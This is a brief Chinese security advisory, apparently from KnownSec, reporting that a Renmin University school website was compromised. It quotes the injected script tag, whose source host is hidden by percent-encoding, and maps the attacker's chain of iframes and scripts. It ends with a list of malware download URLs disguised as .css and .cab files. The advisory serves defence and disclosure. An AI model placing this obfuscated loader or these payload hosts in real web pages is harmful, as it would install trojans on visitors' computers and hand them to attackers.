中国人民大学国际关系学院被植入恶意代码(图)

知道创宇安全团队（KnownSec Team）于今天捕获 中国人民大学国际关系学院（http://sis.ruc.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://sis.ruc.edu.cn/

网页被嵌入恶意链接代码：

<script language=’JavaScript’ type=’text/JavaScript’ src=’http://%77%33%6F%67%2E%63%6E/%73%2E%6A%73′></script>

挂马分析：

[wide]http://sis.ruc.edu.cn/
 [script]http://%77%33%6f%67%2e%63%6e/%73%2e%6a%73
  [frame]http://32111ssaa.3322.org/a21/a21.htm
   [frame]http://32111ssaa.3322.org/a21/new.html
    [script]http://32111ssaa.3322.org/a21/../zhin.js
    [frame]http://32111ssaa.3322.org/a21/../14.htm
    [frame]http://32111ssaa.3322.org/a21/fx.htm
    [frame]http://32111ssaa.3322.org/a21/../cx.htm
    [frame]http://32111ssaa.3322.org/a21/../real10.htm
    [frame]http://32111ssaa.3322.org/a21/../real11.htm
    [script]http://32111ssaa.3322.org/a21/../wewew.js
   [script]http://s53.cnzz.com/stat.php?id=1407783&web_id=1407783&show=pic2
  [frame]http://100xx.com.cn/tj.htm

最终下载病毒文件：

http://www.19399.com.cn/lzz.css
http://www.19399.com.cn/as.css
http://www.19399.com.cn/bf.css
http://www.19399.com.cn/ms.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。